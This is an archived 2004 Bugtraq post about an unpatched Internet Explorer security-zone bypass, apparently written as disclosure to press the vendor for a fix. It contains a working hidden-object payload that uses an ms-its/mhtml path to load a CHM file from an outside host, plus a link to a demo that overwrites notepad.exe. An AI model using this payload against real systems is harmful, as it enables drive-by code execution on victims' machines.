lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200403290136.i2T1aXGT007384@web171.megawebservers.com>
Date: Mon, 29 Mar 2004 01:36:33 -0000
From: "http-equiv@...ite.com" <1@...ware.com>
To: <bugtraq@...urityfocus.com>
Subject: re: New worm?




<!-- 

GET / HTTP/1.1 
HTTP/1.1 200 OK 
Server: My Bitchin' IE Infector 
Date: Sat Mar 27 13:22:27 2004 
Content-type: text/html 
Accept-Encoding: identity 
Accept-ranges: bytes 

<<snip content>> 

-->

<<reinsert content>> 



<object data="ms-its:mhtml:file://C:foo.mhtml!
http://www.malware.com//foo.chm::/foo.html" type="text/x-
scriptlet" style="visibility:hidden">


This is brilliant. Simplicity at it's best. While the original 
is not particularly robust the above container should remedy 
that. In typical fashion Internet Explorer and it's 'masters' 
can simply be fooled into thinking they are in the 'local zone' 
via a non-existent file on the drive. Quite trivial to achieve 
and at the same time absolutely brilliant. This is all quite 
reminiscent of the Ibiza Trojan from beginning February 2004 
which would make this unpatched problem well over one month now.

Fully functional working demo, harmless .exe which over-writes 
notepad.exe, the 'guts' of this particular demo which will be 
flagged by any competent anti-virus suite should not be 
considered the solution. The manufacturer of this particular 
product that allows for all of this should be the one to address 
it - once and for all - at the core level:


http://www.malware.com/junk-de-lux.html


End Call


-- 
http://www.malware.com





Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ